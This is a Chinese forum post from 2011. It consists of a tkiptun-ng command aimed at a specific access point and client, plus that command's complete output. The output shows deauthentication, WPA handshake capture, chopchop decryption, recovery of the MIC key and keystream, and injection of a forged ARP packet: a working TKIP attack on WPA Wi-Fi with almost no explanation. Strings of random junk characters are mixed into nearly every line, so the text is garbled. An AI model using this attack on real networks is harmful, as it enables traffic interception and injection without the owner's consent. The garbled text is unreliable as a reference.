中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入- J' V; m; g0 _' y: c/ u2 d$ h& N! w
4 Z. ]3 f( [) ~8 T6 ]: H
7 P. d1 k$ M% k7 D/ r tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0 1 V i) V. X$ L; N
/ o4 Q+ P# r/ n" {1 F- [
Output: 输出& Y$ W& ?: E" |3 v
* s+ J( ]% Q$ s% \6 C The interface MAC (00:0E:2E:C5:81 3) doesn't match the specified MAC (-h).
* v$ s; X/ [; ]( B; r* t9 N ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
& E |8 T9 B; E8 P3 m+ ~: H Blub 2:38 E6 38 1C 24 15 1C CF 0 v2 _4 m N9 Z* E5 V7 A4 E
Blub 1:17 DD 0D 69 1D C3 1F EE 3 M) V" I9 C& \* h
Blub 3:29 31 79 E7 E6 CF 8D 5E
3 R9 H1 p) D* v 15:06:48 Michael Test: Successful
: _, ]; H7 Z. a# C5 K& H8 h( I 15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
& }3 @4 _9 q# P; U 15:06:48 Found specified AP( K9 X% W. t L( F; `$ J" |
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]- R& |7 c% {3 G G6 Z- h6 n
15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
4 ]/ `6 k! r7 `2 q 15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
; Q" o3 O( x& l3 [ 15:06:56 Waiting for an ARP packet coming from the Client...
* j5 ]/ f+ p) d% F( l5 Z Saving chosen packet in replay_src-0305-150705.cap
+ W. \2 c# e- C! `% D; Y 15:07:05 Waiting for an ARP response packet coming from the AP...
- V5 J$ o$ R! ]' u5 |3 e Saving chosen packet in replay_src-0305-150705.cap$ U) Y- \: C, A5 C& Y5 ]2 }3 |
15:07:05 Got the answer!
6 s8 r3 c& [) P; w1 O8 E* V 15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
3 t4 Z7 }# X ^ C ! C( l! M- K' }& a" v4 W( g
15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms b1 x8 v, p( ^ u4 _8 @0 ?+ x
15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms
1 H7 w% W' m2 Q) T; P& T$ m 15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms6 Z3 d+ e* Y7 R3 i5 O% C
15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms
9 ?' r: x% q4 }: {- {5 A% t 15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms
& \% ?1 v7 c/ ` 15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms, _/ {3 t7 v* f9 }' e2 r
15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms
. M1 N# {& V3 H" C) E; E6 V6 \" { 15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms0 x4 f7 @( ^, t- A( X5 Q
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
: q; I5 G. _# b1 g 15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms, Y& Y! H, v' z
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms/ x7 R, ~! [! _7 l1 V! f" b
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.' b7 X: B! s& h6 \& _& {
15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
3 R8 _7 J8 r: ~ Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
3 B9 t; U7 r1 M4 u Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
0 E5 t J4 w3 \0 k 15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms/ y% d4 H7 c3 C
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms$ C' @: w: s4 h) H# g/ C2 o E7 U9 T% |
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms
2 K2 ], Q$ q: E2 d/ a/ M 15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms
5 Y1 O, t) N/ }0 U. f 15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms
0 e* a# @) h: I. S 15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms: f+ r9 _% e, h) g# J
15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms
7 |& W' s/ ~6 `' @5 O# C 15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms- B+ j _+ f5 v
15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms
: F6 r! \. A6 ^) o 15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms: y$ H# Z0 n! W& ` ?3 X) q6 T
15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms; D6 R, b9 a6 y
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.- E/ S4 c- I; I: [
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms8 C1 \5 i+ l& V
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down." v: q% r: a: d; P1 P6 {/ r
15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms/ ]$ o, a1 l, ~: _ F3 ^9 ~ y
15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms6 o5 I0 g# v& s9 v
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.3 y! X- f9 p/ D( U( t6 H" G
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms0 `$ K$ e/ I3 |0 H3 d2 f7 n
15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
$ a. j- t4 u' i+ i 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms( |4 q9 F2 o" N+ C
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
! y! U+ P+ X5 ]& w6 k/ i6 T! B7 x! h 15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms/ A* d. t- p( K0 _
15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
4 u$ V9 [. e4 W Sleeping for 60 seconds.36 bytes still unknown- U8 p7 g& x* ^/ a8 ]9 F
ARP Reply
( D3 G5 h! t0 t/ p- F Checking 192.168.x.y
" n+ e2 S, f$ E8 R, g 15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66: E% S% |! k1 w* l7 q3 w: M U
. G) y( _& z2 S, x* j- V8 \; Q
Saving plaintext in replay_dec-0305-155411.cap
9 v$ f" R$ C" _* L% o7 z Saving keystream in replay_dec-0305-155411.xor
2 |' D- ?% S- M8 v: e2 r P% B 15:54:11 $ a5 h( M- D& ]3 f% ]
Completed in 2816s (0.02 bytes/s)/ c$ U1 l( W! l; }$ R
2 p! {2 N* j( b/ I/ x 15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42* q7 @! e! y/ E4 U1 l8 p
15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112 O' o* E5 i# n# g5 d6 f
15:54:11 Sent encrypted tkip ARP request to the client. U. p- b" y$ p! v7 @
15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|
[复制链接]
IP卡
狗仔卡
发表于 2011-5-16 06:41
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡